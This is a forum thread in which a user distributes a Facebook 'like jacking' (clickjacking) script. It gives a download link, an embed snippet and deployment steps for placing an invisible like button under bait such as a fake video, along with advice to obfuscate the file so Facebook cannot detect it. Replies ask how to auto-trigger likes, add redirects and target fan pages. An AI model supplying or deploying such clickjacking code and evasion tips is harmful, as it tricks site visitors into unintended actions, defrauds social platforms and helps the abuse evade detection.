Face Thief - The Ultimate Like Jacking Script ... SIMPLE TO USE!

Status
Not open for further replies.

StellaArtois

BANNED
Joined
Jun 13, 2011
Messages
104
Reaction score
357
Here is another release for today. My very own Like Thief like jacking script. This is so easy, and simple to use. I promise.

Example: http://bbmluv.com/likethief/example.php
Download: http://www.mediafire.com/?9daw88koasb0ohf

Instructions:

1. Upload the JS, and CSS folder to your server.
2. Open the page you want to add click jacking on.
3. Add the following code to the bottom of your page that you want the click jacking on. Add it right at the bottom before the </body> tag:

<script src="js/gQs8pPR.js"></script>
<script>
var bootstrap = new bootstrap('http://yoursite.com', 'ID', 'app ID');
bootstrap.init();
</script>

... You need to modify 3 things in the above code.

http://yoursite.com = Your URL
ID = The ID of the HTML element that you want the invisible like button to be activated under the mouse cursor when the user hovers over it. This can be an image, a button, a pretend video. Anything to get the user to click (check the example.php to see what I mean)
app ID = Your Facebook app ID.

Note: You can also give the <body> tag an ID so the click jacking is active on the entire page.

That's it. Just a couple of lines of code on your page. You DO NOT need to include any of the Facebook scripts. My script does all that automatically.

Tips:
  • If you want the user to be redirected after they click I would suggest adding a JavaScript timer, set it to 10 seconds once the user hovers over the button. I might add this to the next update if I get enough requests.
  • Change the filename, and maybe obfuscate the code so Facebook can't pick up any footprints.

Updates:

I will update this as time goes on. If there are any features you want, feel free to let me know in the thread.

If you have any problems, or bugs, let me know and I'll fix them instantly. This is a modified version of my older script that I used to bank a lot of money with in the past.

Enjoy.
 
Last edited:
Will release another update later today where you can rotate domains.
 
your example doesn't work in chrome, did u test it there?

Yes, it was developed in chrome and tested on FF, Safari and latest IE. Are you logged into Facebook? Try clicking it when the hand is not present, sometimes it displays a pointer but still works.
 
Is there a way of automating it making the "like" occur soon as the page loads? Maybe within the onload parapmeter of the HTML tag? It would be epic for a fb page :P
 
It's a nice script, you'll get a few likes from us testing it ;)

@ Goodvery, Do you have JavaScript enabled? You have to click on the image to "Like" the page.
 
Is there a way of automating it making the "like" occur soon as the page loads? Maybe within the onload parapmeter of the HTML tag? It would be epic for a fb page :P

No it's impossible to do that.
 
It's a nice script, you'll get a few likes from us testing it ;)

@ Goodvery, Do you have JavaScript enabled? You have to click on the image to "Like" the page.

The likes are going to hotmail.com :p
 
can we make them Like Facebook Fan Page? using this

I believe so yes. I've not tried since they enforced the app ID's with like buttons but I assume you can replace the URL with a fan page.
 
Can I put this code on any page? And what if I have a page that already has a like button how can I make it as if the viewer clicked my like button?
 
can we set a cookie or start a $_SESSION every time user likes a link so if he clicks again,the like not to be reset??

can you provide us the hover code for redirecting after some seconds??

thanks!
 
please add javascript timer and can you confirm how it works with facebook fanpage ?
 
Status
Not open for further replies.
Back
Top